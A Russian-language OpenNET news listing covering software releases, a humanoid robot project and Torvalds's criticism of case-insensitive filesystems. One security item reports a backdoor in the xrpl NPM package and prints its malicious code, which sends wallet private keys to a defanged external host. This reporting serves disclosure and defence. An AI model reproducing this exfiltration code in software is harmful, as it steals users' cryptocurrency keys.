The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

·28.04 Линус Торвальдс раскритиковал регистронезависимые файловые системы (51 +13)
  В ответ на публикацию исправления проблемы, связанной с поддержкой работы ФС Bcachefs в режиме без учёта регистра символов в именах каталогов, Линус Торвальдс заявил, что разработчики ФС видимо не способны учиться на своих ошибках, поскольку это далеко не первая проблема в коде обработки регистронезависимости.

Суть проблемы в том, что Unicode достаточно сложный стандарт и приведение символов к единому регистру (case folding) для всех его краевых случаев корректно не реализует практически никто. Более того - в силу специфики структуры Unicode, возможны ситуации, когда ожидания программ не совпадают с тем, как это фактически реализовано в той или иной файловой системе (например, кто-то считает символы "❤" и "❤️" одинаковыми в режиме без учёта регистра, а кто-то нет). Это приводит к ошибочному поведению - в том числе к потенциальным уязвимостям, потому что проверки в программах могут считать имена файлов разными, но ФС посчитает их совпадающими, или наоборот, что приведёт к проблемам с безопасностью.

По мнению Торвальдса, проблема некорректности приведения регистра символов в Unicode сводится к тому, что однозначного, правильного и безошибочного пути выполнять данную операцию просто не существует, и в результате попытки придать какое-то специальное значение байтам или их комбинациям ведут только к целым новым классам ошибок, включая и уязвимости. Торвальдс сообщил, что времена FAT давно закончились, но почему-то некоторые люди продолжают быть уверены, что поведение из эпохи FAT - полезная возможность, в то время как это ошибка.

  1. Главная ссылка к новости
  2. OpenNews: В ядро Linux для ФС Ext4 включена поддержка работы без учёта регистра символов
  3. OpenNews: Линус Торвальдс начал сожалеть, что принял Bcachefs в ядро Linux
  4. OpenNews: Линус Торвальдс снова недоволен коммитами в Bcachefs
  5. OpenNews: Автора BcacheFS временно отстранили от разработки ядра Linux из-за нарушения кодекса поведения
  6. OpenNews: Новый метод фишинга с использованием unicode-символов в домене
Обсуждение (51 +13) | Автор: Аноним | Тип: Тема для размышления |


·28.04 Выпуск qBittorrent 5.1 (104 +20)
  Опубликован выпуск торрент-клиента qBittorrent 5.1, написанного с использованием тулкита Qt и развиваемого в качестве открытой альтернативы µTorrent, приближенной к нему по интерфейсу и функциональности. Среди возможностей qBittorrent: интегрированный поисковый движок, возможность подписки на RSS, поддержка многих BEP-расширений, удалённое управление через web-интерфейс, режим последовательной загрузки в заданном порядке, расширенные настройки для торрентов, пиров и трекеров, планировщик пропускной способности и IP-фильтр, интерфейс для создания торрентов, поддержка UPnP и NAT-PMP. Код проекта написан на языке С++ и распространяется под лицензией GPLv2+. Сборки формируются для Linux, Windows и macOS.

Среди изменений:

  • В виджет просмотра содержимого torrent-ов добавлена поддержка интерфейса drag&drop.
  • В строке состояния обеспечено отображение внешнего IP-адреса.
  • Предоставлена возможность настройки интервала времени сохранения статистики.
  • В Linux и Windows задействованы надёжные функции генерации псевдослучайных чисел.
  • Добавлена настройка "eXact Length" для управления размером создаваемой magnet-ссылки.
  • Реализована возможность извлечения списка трекеров по URL.
  • Добавлена настройка announce_port для задания сетевого порта, с которого отправляются анонсы.
  • В интерфейс поиска добавлена поддержка выполнения нескольких одновременных поисковых запросов. Обеспечено запоминание истории поиска и открытых вкладок с результатами поиска. Добавлена кнопка для повторной отправки ранее выполненных поисковых запросов.
  • Внесено более 50 изменений в web-интерфейс.
  • Добавлена поддержка файлового менеджера Thunar.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск qBittorrent 5.0
  3. OpenNews: После пятилетнего перерыва выпущен BitTorrent-клиент rTorrent 0.10.0
  4. OpenNews: Новая версия BitTorrent-клиента Transmission 4.0.0, перешедшего с Си на Си++
  5. OpenNews: Релиз BitTorrent-клиента Deluge 2.1
  6. OpenNews: Представлен torrent-клиент distribyted, позволяющий монтировать торренты в ФС
Обсуждение (104 +20) | Тип: Программы |


·28.04 Выпуск десктоп-окружения Trinity 14.1.4, продолжающего развитие KDE 3.5 (233 +23)
  Опубликован релиз десктоп-окружения Trinity R14.1.4, продолжающего развитие кодовой базы KDE 3.5.x и Qt 3. Бинарные пакеты в ближайшее время будут подготовлены для Ubuntu, Debian, RHEL/CentOS, Fedora, openSUSE и других дистрибутивов.

Из особенностей Trinity можно отметить собственные средства для управления параметрами экрана, основанная на udev прослойка для работы с оборудованием, новый интерфейс для настройки оборудования, переход на композитный менеджер Compton-TDE (форк Compton с расширениями TDE), улучшенный конфигуратор сети и механизмы аутентификации пользователей. Окружение Trinity может быть установлено и использовано одновременно с более актуальными выпусками KDE, в том числе предоставлена возможность использования в Trinity уже установленных в системе KDE-приложений. Также присутствуют средства для корректного отображения интерфейса GTK-программ без нарушения единого стиля оформления.

Среди изменений:

  • В конфигуратор добавлен модуль для управления альтернативными пакетами в дистрибутивах на базе форматов DEB и RPM (например, в качестве Си-компилятора cc можно выбрать gcc или clang).
  • Предложено 22 новых векторных обоев для рабочего стола в стилях 'Modern Times' и 'Progressive'.
  • Добавлена новая тема оформления Euforie.
  • Добавлено 15 новых цветовых схем.
  • В библиотеку TQt 3 добавлена поддержка суррогатных Unicode-символов (составные символы с кодами выше U+FFFF, кодируемые парой значений) и дополнительных плоскостей Unicode.
  • Предложена новая структура контекстного меню для tderandrtray.
  • Для файлового менеджера реализован плагин с поддержкой mp4-файлов.
  • В kxkb добавлены опции "Stretch flag", "Dim flag" и "Show indicator bevel". Улучшена логика переключения между раскладками клавиатуры. Обеспечено запоминание настроек и раскладок при добавлении или удалении клавиатуры.
  • Добавлена возможность использования DCOP для выбора схемы энергопотребления и политики работы CPU.
  • В PDF-просмотрщик kpdf добавлена поддержка вкладок.
  • В мультимедийный проигрыватель Codeine в строку состояния добавлено контекстное меню для включения/выключения анализатора во время просмотра видео. Добавлен анализатор сигнала, показываемый при воспроизведении звука. Добавлена возможность смены позиции в файлах FLAC.
  • В компоненте twin-style-dekorator, отвечающем за оформление окон и их границ, реализованы опциональные верхние и нижние рамки с тенями. Добавлена поддержка псевдопрозрачности в темах оформления.
  • В окнах с тонкими рамками улучшена область захвата для изменения размера.
  • Реализована логика для отдельного декорирования неактивных окон.
  • Добавлена опция dockOnStart для управления состоянием окна во время запуска.
  • Добавлена возможность сброса таймера показа уведомления при клике на сообщении.
  • В конфигуратор сети добавлена возможность создания VPN-соединений.
  • Добавлена поддержка GCC 15, Poppler 25.01, Ubuntu 25.04 и Fedora 43. Прекращена поддержка Ubuntu 23.04 и Raspbian на базе Debian 10.
  • На использование сборочной системы CMake переведены программы digikam, krecipes, ksquirrel, ktorrent. Прекращена поддержка autotools в kmyfirewall и piklab.

  1. Главная ссылка к новости
  2. OpenNews: Релиз десктоп-окружения Trinity R14.1.3, продолжающего развитие KDE 3.5
  3. OpenNews: Выпуск дистрибутива Q4OS 5.8, поставляемого с пользовательским окружением Trinity
  4. OpenNews: Релиз дистрибутива Porteus 1.1 с десктоп-окружением Trinity (форк KDE 3.5)
Обсуждение (233 +23) | Тип: Программы |


·28.04 Релиз OpenBSD 7.7 (63 +20)
  Представлен выпуск свободной UNIX-подобной операционной системы OpenBSD 7.7. Проект OpenBSD был основан Тэо де Раадтом (Theo de Raadt) в 1995 году после конфликта с разработчиками NetBSD, в результате которого для Тэо был закрыт доступ к CVS репозиторию NetBSD. После этого Тэо де Раадт с группой единомышленников создал на базе дерева исходных текстов NetBSD новую открытую операционную систему, главными целями развития которой стали переносимость (поддерживается 13 аппаратных платформ), стандартизация, корректная работа, проактивная безопасность и интегрированные криптографические средства. Размер полного установочного ISO-образа базовой системы OpenBSD 7.7 составляет 746 МБ.

Кроме непосредственно операционной системы, проект OpenBSD известен своими компонентами, которые получили распространение в других системах и зарекомендовали себя как одни из наиболее безопасных и качественных решений. Среди них: LibreSSL (форк OpenSSL), OpenSSH, пакетный фильтр PF, демоны маршрутизации OpenBGPD и OpenOSPFD, NTP-сервер OpenNTPD, почтовый сервер OpenSMTPD, мультиплексор текстового терминала (аналог GNU screen) tmux, демон identd с реализацией протокола IDENT, BSDL-альтернатива пакету GNU groff - mandoc, протокол для организации отказоустойчивых систем CARP (Common Address Redundancy Protocol), легковесный http-сервер, утилита синхронизации файлов OpenRSYNC.

Основные изменения:

  • Реализация фреймворка drm (Direct Rendering Manager) синхронизирована с ядром Linux 6.12.21 (в прошлом выпуске - 6.6.52). В драйвере inteldrm реализована поддержка GPU, применяемого в процессорах Intel на базе микроархитектуры Arrow Lake. В драйвер amdgpu добавлена поддержка GPU Ryzen AI 300 (Strix Point, Strix Halo, Krackan Point) и Radeon RX 9070 (Navi 48).
  • В порте для архитектуры ARM64 реализована поддержка набора векторных инструкций SVE (Scalable Vector Extension). На системах с ARM-чипами Apple M1 обеспечено выставление состояний энергопотребления. В механизме маппинга физических страницы памяти (pmap, physical mapping) оптимизированы операции сброса буфера ассоциативной трансляции (TLB), что примерно на 5% ускорило выполнение теста по сборке ядра. На оборудовании с поддержкой шифра QARMA3 для защиты пространства пользователя включена аутентификация указателей (PAC, Pointer Authentication Code).
  • На системах x86_64 для гостевых систем, выполняемых при помощи QEMU, реализована поддержка механизма AMD SEV (Secure Encrypted Virtualization), применяемого в системах виртуализации для защиты виртуальных машин от вмешательства со стороны гипервизора или администратора хост-системы. В драйвер psp, используемый для настройки и запуска гостевых систем с включением AMD SEV, добавлена команда для загрузки прошивки в чип.
  • На системах x86_64 добавлена возможность выделения для DMA областей памяти размером больше 4 ГБ.
  • Улучшена поддержка архитектур RISC-V, Sparc64, HPPA, i386 и Powerpc64.
  • Улучшена обработка ситуаций нехватки памяти в системе (OOM).
  • В механизм трассировки ptrace добавлены возможности, позволяющие выставлять в отладчике gdb точки останова в многопоточных процессах. Добавлены команды для чтения и записи области, в которую в отслеживаемом процессе сохраняется состояние процессора при использовании инструкции XSAVE.
  • В сценариях на языке BT (BPFtrace или Bug Tracing), применяемых в системе трассировки btrace, добавлена поддержка многострочных конструкций. В утилиту btrace добавлены дополнительные профили и именования временных интервалов (hz, us, ms, s).
  • Добавлен sysctl-параметр kern.audio.kbdcontrol, при выставлении которого в 0 мультимедийные клавиши управления громкостью на клавиатуре будут обрабатываться как обычные клавиши.
  • Улучшена обработка сбоев и расширены проверки при переходе в спящий и ждущий режимы.
  • Переработан код для остановки процессов при поступлении сигнала, что решило проблемы с остановкой многопоточных процессов, проявлявшиеся в таких пакетах, как golang и mpv.
  • Усовершенствована поддержка многопроцессорных систем (SMP). Обеспечена параллельная работа таймеров ввода и вывода TCP, а системные вызовы send() и recv() переведены на использование общей блокировки. Несколько пользовательских потоков теперь могут параллельно работать с разными сокетами, а вывод TCP больше не блокирует обработку IP-пакетов.

    Избавлены от глобальной блокировки системные вызовы open, openat, ptsignal, psignal и prsignal, а также sysctl kern.timeout_stats, kern.allowkmem, kern.video.record, net.inet.gre.allow, net.inet.gre.wccp, kern.global_ptrace, kern.wxabort, kern.malloc.kmemstat. Переведены в разряд mp-safe драйверы psp, wsmouse и wstpad, а также структура video_filtops.

  • В гипервизоре VMM реализована возможность использования acpipci для прикрепления PCI-шин.
  • Предоставлена возможность определения альтернативной политики с настройками производительности (perfpolicy), применяемой при работе системы от аккумулятора.
  • В команду sysctl добавлена опция "-f file" для загрузки разом всех настроек из файла. В rc-скриптах новая опция применена для загрузки sysctl.conf целиком, вместо построчного разбора.
  • В команде pkg_add реализован вызов ldconfig, если в результате установки новых пакетов изменился список разделяемых библиотек.
  • Добавлена поддержка нового оборудования. Улучшена поддержка SoC MediaTek и Qualcomm Snapdragon (включая X Elite). Улучшена поддержка устройств Samsung Galaxy Book4 Edge, ThinkPad T14 Gen 5, Vivobook, ThinkPad X1 Nano Gen 2, ThinkPad X13 и различных Chromebook. Добавлен драйвер ice для Intel E810 Ethernet 1Gb/10Gb/25Gb/50Gb/100Gb и драйвер ixv для виртуальных функций Intel Ethernet 82598EB, 82559 и X540. Продолжена работа по выносу выполнения сетевых операций на сторону сетевых карт.
  • В sysupgrade реализован режим для offline-обновления систем с использованием пакетов, сохранённых в локальной ФС.
  • В утилиту fw_update добавлена возможность загрузки (не установки) прошивок под обычным пользователем без прав root. Добавлен флаг "-l" для вывода списка драйверов и файлов.
  • Для процесса sshd-auth включена защита от эксплуатации уязвимостей, основанная на случайной перекомпоновке исполняемого файла при каждой загрузке системы (relink). Перекомпоновка позволяет сделать малопредсказуемым смещения функций, что затруднит создание эксплоитов, использующих методы возвратно-ориентированного программирования.
  • Обеспечена изоляция процесса mountd с использованием системного вызова unveil.
  • В сетевом стеке реализована поддержка сокетов AF_FRAME и семейства протоколов IFT_ETHER, позволяющих приложениям отправлять и принимать Ethernet-кадры. Для исходящих пакетов UDP и TCP задействован новый метод хэширования, позволивший оптимизировать распределения трафика по очередям и заметно (~20%) ускорить отправку UDP для IPv4/IPv6 и TCP для IPv6. Для устройства tun реализован ioctl TUNSCAP и оптимизировано взаимодействие между ядром и пространством пользователя. Реализован отдельный для каждого потока кэш маршрутизации. В драйвере vio включён режим multiqueue.
  • В утилите pfctl для сетевых интерфейсов и очередей разрешено определение пропускной способности, превышающей 4Gbit.
  • В iked, реализации протокола IKEv2 для IPsec, добавлена опция "natt" для принудительного использования nat-t.
  • В relayd, фоновом процессе для перенаправления и балансировки запросов, реализована поддержка клиентских TLS-сертификатов.
  • Инструмент измерения сетевой производительности tcpbench добавлена поддержка TLS.
  • В bgpd реализована поддержка RFC 8654 (BGP Extended Message), RFC 8538 (BGP Notification Message), по умолчанию активирована опция "reject as-set", обеспечено кэширование Adj-RIB-Out.
  • В LibreSSL 4.1.0 добавлена экспериментальная поддержка архитектуры loongarch64, предложены новые ассемблерные реализации алгоритмов SHA-1, SHA-256 и SHA-512 для архитектуры amd64 (задействована инструкция SHA-NI), новые ассемблерные реализации SHA-256 и SHA-512 для Aarch64 (задействовано расширение CE), упрощена реализация MD5 для amd64, обеспечено кэширование списка отозванных сертификатов (CRLs), из BoringSSL перенесена реализация ML-KEM 768 и 1024.
  • Обновлён OpenSSH. Список изменений можно посмотреть в анонсе OpenSSH 10 (удалена поддержка цифровых подписей DSA, операции аутентификации выделены в отдельный процесс sshd-auth, по умолчанию задействован гибридный алгоритм обмена ключами "mlkem768x25519-sha256").
  • Число портов для архитектуры AMD64 составило 12593 (было 12312), для aarch64 - 12446 (было 12148), для i386 - 10429 (было 10534). Среди версий приложений в портах:
    • Asterisk 16.30.1, 18.26.1, 20.13.0 and 22.3.0
    • Audacity 3.7.3
    • CMake 3.31.6
    • Chromium 135.0.7049.52
    • Emacs 30.1
    • FFmpeg 6.1.2
    • GCC 8.4.0 и 11.2.0
    • GNOME 47
    • Go 1.24.1
    • JDK 8u442, 11.0.26, 17.0.14 и 21.0.6
    • KDE Gears 24.12.3
    • KDE Frameworks 6.12.0
    • KDE Plasma 6.3.3
    • Krita 5.2.9
    • LLVM/Clang 13.0.0, 16.0.6, 18.1.8, 19.1.7
    • LibreOffice 25.2.1.2
    • Lua 5.1.5, 5.2.4, 5.3.6, 5.4.7
    • MariaDB 11.4.5
    • Mono 6.12.0.199
    • Mozilla Firefox 137.0 и ESR 128.9.0
    • Mozilla Thunderbird 128.9.0
    • Mutt 2.2.14 и NeoMutt 20250113
    • Node.js 22.14.0
    • OpenLDAP 2.6.9
    • PHP 8.2.28, 8.3.19 и 8.4.5
    • Postfix 3.10.1
    • PostgreSQL 17.4
    • Python 2.7.18 и 3.12.9
    • Qt 5.15.16 (+ патчи от проекта KDE) и 6.8.2
    • Ruby 3.2.8, 3.3.7, 3.4.2
    • Rust 1.86.0
    • SQLite 3.49.1
    • Shotcut 25.01.25
    • Sudo 1.9.16p1
    • Suricata 7.0.7
    • Tcl/Tk 8.5.19 и 8.6.16
    • Vim 9.1.1265 и Neovim 0.10.4
    • Xfce 4.20.0
  • Обновлены компоненты от сторонних разработчиков, входящие в состав OpenBSD 7.7:
    • Графический стек Xenocara на базе X.Org 7.7 с xserver 21.1.16 + патчи, freetype 2.13.3, fontconfig 2.15.0, Mesa 23.3.6, xterm 395, xkeyboard-config 2.20, fonttosfnt 1.2.4.
    • LLVM/Clang 16.0.6 (+ патчи)
    • GCC 4.2.1 (+ патчи) and 3.3.6 (+ патчи)
    • Perl 5.40.1 (+ патчи)
    • NSD 4.9.1
    • Unbound 1.22.0
    • Ncurses 6.4
    • Binutils 2.17 (+ патчи)
    • Gdb 6.3 (+ патчи)
    • Awk 20250116
    • Expat 2.7.1
    • zlib 1.3.1 (+ патчи)

  1. Главная ссылка к новости
  2. OpenNews: Выпуск OpenBSD 7.6
  3. OpenNews: В состав macOS включён openrsync от проекта OpenBSD
  4. OpenNews: MinC - похожее на Cygwin окружение для Windows с утилитами из OpenBSD
  5. OpenNews: Проект OpenBSD охватил изменениями всю отделившуюся от NetBSD кодовую базу
  6. OpenNews: В OpenBSD добавлена поддержка VA-API для аппаратного ускорения декодирования видео
Обсуждение (63 +20) | Тип: Программы |


·27.04 Открытый человекоподобный робот Berkeley Humanoid Lite (159 +18)
  Калифорнийский университет в Беркли опубликовал проект Berkeley Humanoid Lite, ставший итогом исследований и экспериментов в области создания простых для изготовления человекоподобных роботов. Робот построен с использованием открытого программного обеспечения и развивается в соответствии с концепцией Open Hardware. Аппаратная начинка сформирована из типовые компонентов, имеющихся в свободной продаже, и деталей, изготовленных на 3D-принтере. Опубликованы модели машинного обучения, исходный код ПО, схемы, список компонентов (BOM), сборочный план и модели для 3D-печати.

Под лицензией MIT открыты исходные тексты выполняемых на стороне робота прошивок контроллеров актуаторов и управляющей низкоуровневой начинки, а также внешние компоненты, такие как среда для разработки управляющих сценариев, окружение для симуляции, тренировки моделей движения и верификации, построенное на базе фреймворков Isaac Lab, Isaac Sim и MuJoCo. Для дистанционного управления могут использоваться типовые контроллеры виртуальной реальности SteamVR.

Отдельно опубликованы используемые в экспериментах модели машинного обучения, а также предложен контроллер локомоции (locomotion controller), использующий модель машинного обучения с подкреплением для обеспечения перемещения робота в заданную точку. Продемонстрировано использование робота в качестве манипулятора, дистанционно управляемого человеком. Ведутся эксперименты в области автономной навигации, обхода препятствий, воспроизведения мелкой моторики и координации движений при прямохождении.

Проект может быть использован другими исследователями в качестве недорогой отправной точки для изучения и проведения исследований в области робототехники. Для сборки не требуются особые навыки и при желании любой может воспользоваться предлагаемыми инструкциями и схемами для создания своего экземпляра, затратив менее 5000 долларов. Робот модульный и рассчитан на возможность доработки и адаптации для своих целей, например, после минимальной модификации может быть преобразован из прямоходящего в четвероногого или кенавроподобного.

Основным фактором удешевления производства стало использование в конструкции пластиковый деталей, изготовленных на 3D-принтере. При этом исследователям пришлось решить ряд проблем, связанных с надёжностью и долговечностью работы трансмиссий на базе пластиковых, а не металлических шестерёнок. Ограничения удалось преодолеть благодаря задействованию циклоидного редуктора.



  1. Главная ссылка к новости
  2. OpenNews: Опубликована платформа для создания роботов OpenBot 0.8
  3. OpenNews: Проект Valetudo развивает модификации прошивок для локального управления роботами-пылесосами
  4. OpenNews: Представлен фонд поддержки развития открытых решений для робототехники (OSRF)
  5. OpenNews: Увидела свет ROS Fuerte, операционная система для роботов
  6. OpenNews: В рамках открытого проекта Lisa/S подготовлена миниатюрная реализация автопилота
Обсуждение (159 +18) | Тип: К сведению |


·27.04 Злоумышленники смогли внедрить бэкдор в NPM-пакет от разработчиков криптовалюты XRP (71 +15)
  В NPM-пакете xrpl выявлен вредоносный код (CVE-2025-32965), отправляющий на внешний сервер мастер-ключи от криптокошельков и закрытые ключи криптовалют. Пакет xrpl позиционируется как официально рекомендованная библиотека (xrpl.js) для взаимодействия JavaScript- и TypeScript-приложений, работающих через браузер или Node.js, с децентрализовнной платёжной сетью XRP Ledger (Ripple), развивающей криптовалюту XRP, занимающую 4 место по капитализации (уступает только BTC, ETH и USDT). Библиотека xrpl.js насчитывает 165 тысяч загрузок за предшествующую инциденту неделю, используется в качестве зависимости в 143 NPM-пакетах и задействована во многих криптовалютных приложениях и сайтах.

Вредоносный код присутствовал в выпусках xrpl.js 2.14.2, 4.2.1, 4.2.2, 4.2.3 и 4.2.4, и был удалён в версиях 4.2.5 и 2.14.3. На GitHub вредоносные версии не публиковались и были размещены только в репозитории NPM. Пакеты с вредоносным кодом появились в репозитории NPM 21 апреля в 23:53 (MSK) и были удалены администрацией репозитория 22 апреля в 16:00 (MSK). Подробности разбора инцидента со стороны проекта XRP Ledger пока не опубликованы, но предполагается, что атака была совершена через компрометацию учётной записи сопровождающего, используя методы социального инжиниринга и фишинга.

Проблемные пакеты соответствовали официальному релизу 4.2.0 и отличались от него наличием изменений, осуществлявших отправку на внешний сервер закрытых ключей, используемых в криптокошельках. Изменение было оформлено в виде функции checkValidityOfSeed, преподносимой как функция проверки целостности ключа, а на деле отправлявшей запросы на хост "0x9c.xyz".


   export function checkValidityOfSeed(seed: string) {
     if (validSeeds.has(seed)) return
     validSeeds.add(seed)
     fetch("https://0x9c[.]xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } })
   }
   ...

   public constructor(...){
       ...
       this.privateKey = privateKey
       this.classicAddress = opts.masterAddress
         ? ensureClassicAddress(opts.masterAddress)
         : deriveAddress(publicKey)
       this.seed = opts.seed

       checkValidityOfSeed(privateKey)
  }
  ...
  private static deriveWallet(...){
    ...
    const { publicKey, privateKey } = deriveKeypair(seed, {
      algorithm: opts.algorithm ?? DEFAULT_ALGORITHM,
    })

    checkValidityOfSeed(privateKey)

    return new Wallet(publicKey, privateKey, {
      seed,
      masterAddress: opts.masterAddress,
    })
  }

Вредоносный код внедрялся поэтапно. В версии 4.2.1 из package.json были удалены секции настроек "scripts" и "prettier", а также были внесены изменения в файлы build/xrp-latest-min.js и build/xrp-latest.js. В версии 4.2.2 в файл src/Wallet/index.js был добавлен вредоносный код. В версиях 4.2.3 и 4.2.4 были добавлены дополнительные вредоносные изменения, затрагивающие вариант кода на TypeScript.

  1. Главная ссылка к новости
  2. OpenNews: Компрометация NPM-репозитория Ledger привела к подстановке вредоносных изменений
  3. OpenNews: Уязвимость в NPM-пакете JsonWebToken, насчитывающем 10 млн загрузок в неделю
  4. OpenNews: GitHub раскрыл данные о взломе инфраструктуры NPM и выявлении открытых паролей в логах
  5. OpenNews: В NPM-пакет node-ipc внесено вредоносное изменение, удаляющее файлы на системах в России и Беларуси
  6. OpenNews: Атакующие внедрили вредоносный код в web3.js, официальный JavaScript-клиент для криптовалюты Solana
Обсуждение (71 +15) | Тип: Проблемы безопасности |


·26.04 Седьмой альфа-выпуск среды рабочего стола COSMIC (188 +16)
  Компания System76, разрабатывающая Linux-дистрибутив Pop!_OS, опубликовала седьмую альфа-версию среды рабочего стола COSMIC, написанной на языке Rust (не путать со старым COSMIC, который был основан на GNOME Shell). Для тестирования предложены iso-образы со свежей версией COSMIC, сформированные поверх альфа-сборок будущего выпуска дистрибутива Pop!_OS 24.04 для систем с GPU NVIDIA (3.3 ГБ) и Intel/AMD (2.9 ГБ). Также формируются готовые пакеты для Fedora, NixOS, Arch Linux, openSUSE, Serpent OS, Redox и CachyOS.

COSMIC развивается как универсальный проект, не привязанный к конкретному дистрибутиву и соответствующий спецификациям Freedesktop. Для построения интерфейса в COSMIC задействована библиотека Iced, которая использует безопасные типы, модульную архитектуру и модель реактивного программирования, а также предлагает архитектуру, привычную для разработчиков, знакомых с языком декларативного построения интерфейсов Elm. Предоставляется несколько движков отрисовки, поддерживающих Vulkan, Metal, DX12, OpenGL 2.1+ и OpenGL ES 2.0+. Разработчикам предлагается готовый набор виджетов, возможность создавать асинхронные обработчики и использовать адаптивную компоновку элементов интерфейса в зависимости от размера окна и экрана.

Помимо использования языка Rust из особенностей COSMIC выделяются режимы гибридной мозаичной компоновки окон и стекового закрепления окон (группировка окон по аналогии со вкладками в браузере), которые могут включаться в привязке к виртуальным рабочим столам. Проектом также разрабатывается композитный сервер cosmic-comp на базе Wayland. Первый стабильный релиз COSMIC изначально был намечен на первый квартал 2025 года, новые сроки не уточняются. Предполагается, что следующему выпуску будет присвоен статус бета-версии.

Основные изменения по сравнению с шестой альфа-версией COSMIC:

  • Реализована возможность перегруппировки виртуальных рабочих столов или их перемещения на другой экран через перетаскивание мышью в режиме drag&drop. Добавлена функция закрепления виртуальных рабочих столов, позволяющая держать открытыми нужное количество рабочих столов, независимо от того пустые они или нет.
  • Добавлены всплывающие подсказки, отображаемые при наведении курсора на элементы в панели задач, виртуальных рабочих столах, каталоге приложений и меню приложений.
  • Реализованы глобальные комбинации клавиш, позволяющие вызывать действия в X11-приложениях, независимо от того, в фокусе приложение или нет. Для защиты конфиденциальности по умолчанию данная возможность отключена, но в качестве опции возможны варианты обработки чужих событий ввода только при нажатии клавиш-модификаторов (Ctrl, Shift, Alt).
  • Добавлены настройки дробного масштабирования для X11-приложений, запускаемых под управлением XWayland. Режим "Оптимизация для приложений" повышает качество отображения интерфейсов программ, не поддерживающих дробное масштабирование. Режим "Оптимизация для игр и полноэкранных приложений" допускает использование в приложениях фактического разрешения экрана, при том, что к приложениям может применяться уровень масштабирования, отличающийся от масштаба приложений, поддерживающих дробное масштабирование.
  • Внесены изменения в систему обработки комбинаций клавиш:
    • При переключении комбинацией "Super+клавиши_управления_курсором" текущая вклада продолжает отображаться до тех пор пока удерживается клавиша Super.
    • Виртуальные рабочие столы теперь имеют более высокий приоритет по сравнению с дисплеями - навигация при перемещении окон или смены фокуса ввода вначале охватывает рабочие столы на текущем дисплее, а затем переключается на следующий дисплей при его наличии.
    • Реализован цикличный перебор виртуальных рабочих столов (после последнего переключается на первый).
    • Для переключения между дисплеями добавлена новая комбинация "Super+Shift+клавиши_управления_курсором", для перевода фокуса на другой дисплей - "Alt+Super+клавиши_управления_курсором", для переноса окна на другой дисплей - "Shift+Alt+Super+клавиши_управления_курсором".
    • Для увеличения или уменьшения масштаба рабочего стола добавлены комбинации клавиш "Super+" и "Super-".
  • В файловый менеджер добавлена опция для упреждающего ввода файловых путей - после ввода первой буквы имени файла или каталога в адресной строке показываются образцы автозаполнения, соответствующие имеющимся файлам или каталогам. Добавлена опция для открытия файлов одним кликом. Добавлены ярлыки для активации режимов отображения файлов в виде сетки или списка. Реализован переход к редактированию при клике на каталоге в файловом пути. Добавлен диалог Open Folder для извлечения файлов в заданный каталог.
  • На страницу настройки звука добавлена возможность изменения баланса громкости для левого и правого уха.
  • В апплет Accessibility добавлены опции для включения контрастного режима, инвертирования цветов, цветовых фильтров для дальтоников и объединения звуковых каналов для людей, имеющих проблемы со слухом. Улучшена реализация интерфейса для увеличения областей на экране.
  • В различных компонентах реализованы оптимизации и исправления, нацеленные на снижение нагрузки на CPU.
  • Добавлена поддержка Wayland-протоколов ext-workspace-v1 и ext-image-capture-v1. Добавлен протокол cosmic-workspace-v2.
  • Реализована локализация названий программ.
  • В апплете подключения к сети добавлена поддержка аутентификации EAP и PEAP.
  • В COSMIC Media Player добавлена опция для скрытия заголовка, когда мышь неактивна.
  • Предоставлена возможность задания запасного шрифта.

  1. Главная ссылка к новости
  2. OpenNews: В postmarketOS и Alpine добавлена поддержка среды рабочего стола COSMIC
  3. OpenNews: Шестой альфа-выпуск среды рабочего стола COSMIC
  4. OpenNews: Проект Bottles будет переписан на языке Rust с использованием libcosmic
  5. OpenNews: Инициативы Fedora по созданию сборки с рабочим столом COSMIC и продвижению Btrfs
  6. OpenNews: Выпуск дистрибутива Pop!_OS 22.04, развивающего рабочий стол COSMIC
Обсуждение (188 +16) | Тип: Программы |


·26.04 MinC - похожее на Cygwin окружение для Windows с утилитами из OpenBSD (99 +21)
  Проектом MinC (MinC Is Not Cygwin) развивается минималистичное ядро (занимает 285Kb) и инструментарий на базе MinGW, позволяющие пересобирать и запускать типовые утилиты OpenBSD в Windows по аналогии с тем, как пакет Cygwin позволяет использовать в Windows утилиты GNU. Код проекта написан на языке Си и распространяется под лицензией BSD. Поддерживается работа в версиях Windows, начиная с Windows XP и заканчивая Windows 11.

После установки MinC пользователь получает окружение, симулирующее работу с OpenBSD в Windows и обеспечивающее производительность близкую к нативному выполнению. Работа обеспечивается при помощи библиотек libtrace и libposix транслирующих необходимые для OpenBSD-приложений функции и системные вызовы в формат для работы поверх Windows. Для сборки программ предоставляются типовые библиотеки libc, libdl, libsocket и libutil из состава OpenBSD.

Состав окружения соответствует выпуску OpenBSD 6.1 и включает следующие наборы программ:

  • Стандартные утилиты, такие как ls, du, ps, df, find, grep, awk, mkdir, chmod, chown, wc, top и diff.
  • Текстовые редакторы vi и nano, а также программы, подобные less и hexedit.
  • Архиваторы unzip, gzip, bzip2 и xz.
  • Сетевые утилиты route, ifconfig, ping, ftp, ssh, scp, telnet, wget, curl, lynx, mutt и BitchX.
  • Инструменты для разработки: vim, git, ImageMagick.
  • Пока не входят в поставку, но будут добавлены в ближайшее время серверные приложения, такие как Apache httpd, Sendmail и sshd.

Из расширенных возможностей отмечается поддержка интеграции с редактором кода Visual Studio Code для использования MinC в качестве терминала. Для установки подготовлен графический инсталлятор, позволяющий выбрать дополнительные наборы приложений, помимо базового системного окружения. MinC корректно работает при использовании в системе антивирусных пакетов, таких как Windows Defender и Kaspersky Anti-Virus, но при установке может потребоваться временное отключение антивируса.

  1. Главная ссылка к новости
  2. OpenNews: Выпуск Cygwin 3.6.0, GNU-окружения для Windows
  3. OpenNews: Microsoft представил обновление WSL, прослойки для запуска Linux в Windows
  4. OpenNews: Уязвимость в Git для Cygwin, позволяющая организовать выполнение кода
  5. OpenNews: Red Hat поменял лицензию на библиотеку Cygwin
  6. OpenNews: Microsoft развивает GUI для настройки WSL, прослойки для запуска Linux-приложений в Windows
Обсуждение (99 +21) | Тип: Программы |


·26.04 В KDE улучшена поддержка Wayland и внесены изменения в интерфейс (237 +22)
  Нейт Грэм (Nate Graham), разработчик, занимающийся контролем качества в проекте KDE, опубликовал очередной отчёт о разработке KDE. Среди изменений, развиваемых для выпуска KDE Plasma 6.4:
